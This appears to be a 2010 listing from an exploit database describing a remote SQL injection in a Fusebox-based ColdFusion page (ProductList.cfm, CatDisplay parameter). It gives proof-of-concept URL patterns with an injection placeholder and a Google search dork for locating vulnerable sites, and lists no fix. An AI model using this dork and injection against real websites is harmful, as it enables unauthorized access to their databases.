[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

fusebox (ProductList.cfm?CatDisplay) Remote SQL Injection Vulnerability

Author
Shamus
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12439
Category
web applications
Date add
29-05-2010
Platform
windows
=======================================================================
fusebox (ProductList.cfm?CatDisplay) Remote SQL Injection Vulnerability
=======================================================================


Author       : Shamus
Date         : May, 29 th 2010
Location     : Solo && Jogjakarta, Indonesia
Web          : http://antijasakom.org/forum
Critical Lvl : Moderate
Impact       :-
Where        : From Remote
---------------------------------------------------------------------------
 
 
 
Affected
software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application :
-
version     : -
Vendor      : http://www.fusebox.org/
download  
: http://www.fusebox.org/go/getting-started/downloading-fusebox
Description
: Fusebox is the most popular framework for building ColdFusion and PHP
web applications.
"Fuseboxers" find that the framework releases
them from much of the drudgery of writing applications and enables them
to focus their efforts on creating great, customer-focused software.
--------------------------------------------------------------------------
 
 
 
Vulnerability:
~~~~~~~~~~~~
-
 
PoC/Exploit
:
~~~~~~~~~~
 
http://127.0.0.1/ProductList.cfm?CatDisplay=1%27[SQL
query]
http://127.0.0.1/[path]/ProductList.cfm?CatDisplay=1%27[SQL
query]
 
 
Dork:
~~~~~
Google : ProductList.cfm?CatDisplay
 
 
Solution:
~~~~~
-
N/A.



#  0day.today [2024-07-02]  #